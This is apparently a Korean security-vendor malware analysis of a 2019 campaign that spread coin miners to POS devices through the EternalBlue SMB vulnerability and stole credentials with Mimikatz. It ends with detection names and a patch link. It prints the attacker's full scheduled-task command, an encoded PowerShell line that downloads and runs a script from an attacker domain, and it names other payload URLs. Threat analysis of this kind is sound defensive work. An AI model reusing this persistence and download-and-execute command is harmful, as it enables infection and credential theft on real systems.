본문 바로가기
악성코드 정보

‘EternalBlue’ SMB 취약점(MS17-010)을 통한 악성코드 감염 확산 (2)

by AhnLab ASEC 분석팀 2019. 2. 13.

안랩 ASEC은 지난 2월 11일 EternalBlue SMB 취약점으로 국내 POS 장비에 코인 마이너를 전파하는 공격을 확인하였다. 작년 6월에도 같은 이터널 블루 취약점으로 POS 장비의 인터넷이 마비되는 사건(https://asec.ahnlab.com/1143)이 있었으며 재작년 ‘WannaCrypt’ 이부터 현재까지도 공격자들은 SMB 취약점 공격을 악성코드를 전파하는 데 사용하고 있다. 추가로 이번 공격에 사용된 악성코드는 1월 28일 중국 Tencent 업체에서 언급된 것과 동일한 기능을 갖는 것으로 확인되었다. (https://guanjia.qq.com/news/n3/2475.html)


해당 취약점 공격은 윈도우 보안 패치로 방어할 수 있으므로 POS 장비뿐만 아니라 아직 MS 패치를 적용하지 않은 시스템은 감염 피해를 예방하기 위해 업데이트가 시급하다. 이번 국내 POS 장비 공격 과정은 [그림 1]과 같다.



[그림 1] 국내 POS 장비 공격 흐름도


공격 과정 중 EternalBlue SMB 취약점 공격을 발생시키는 주체인 "svchost.exe" 파일의 주요 기능은 아래와 같다.


[네트워크 행위]

- 로컬 시스템의 60124번 포트 바인딩

- 445번 포트 방화벽 설정

- 파워쉘 명령어를 통해 특정 도메인(v.beahh.com)에서 스크립트를 다운로드

- ipconfig /all, netstat –na 명령을 확인되는 모든 ip 대역을 스캔

- http://ip.42.pl/raw, http://jsonip.com 사이트에서 확인되는 ip 대역을 스캔

- SMB 취약점이 확인된 PC에 아래 파워쉘 명령어 실행 -> http://v.beahh.com/v 사이트 접속 후 스크립트 다운로드 명령


cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr 

 "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcA

ZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAO

gAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="

/F&&c:\\windows\\temp\\svchost.exe

 

[시스템 행위]

- 파워쉘 명령어를 통해 윈도우 계정 패스워드 확인 툴인 MIMIKATZ 실행 (m.ps1)

- MIMIKATZ 툴을 통해서 얻은 계정 정보와 사용자 도메인 정보를 c:\windows\temp\mkatz.ini에 저장

- 파워쉘이 없는 시스템 환경(xp)일 경우 http://w.beahh.com/page.html에 접속하여 스크립트를 다운로드 및 실행


[파일 진단]

현재 안랩 제품에서는 해당 악성코드들을 다음과 같이 진단하고 있다.


파일명

진단명

svchost.exe (SMB 전파)

Trojan/Win32.Trickster.R254998

svchost.exe (sample.exe)

Malware/Win32.Generic.C2950422

wmiex.exe (MAL 1)

Trojan/Win32.Agent.R254993

taskmgr.exe (MAL 2 32bit Binary)

Malware/Win32.Nsanti.C2957178

taskmgr.exe (MAL 2 64bit Binary)

Trojan/Win64.Agent.C3009705

m.ps1 (윈도우 계정탈취)

SCRIPT/Powershell

 


[URL 차단]

 

[SMB 취약점 패치]

- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

댓글1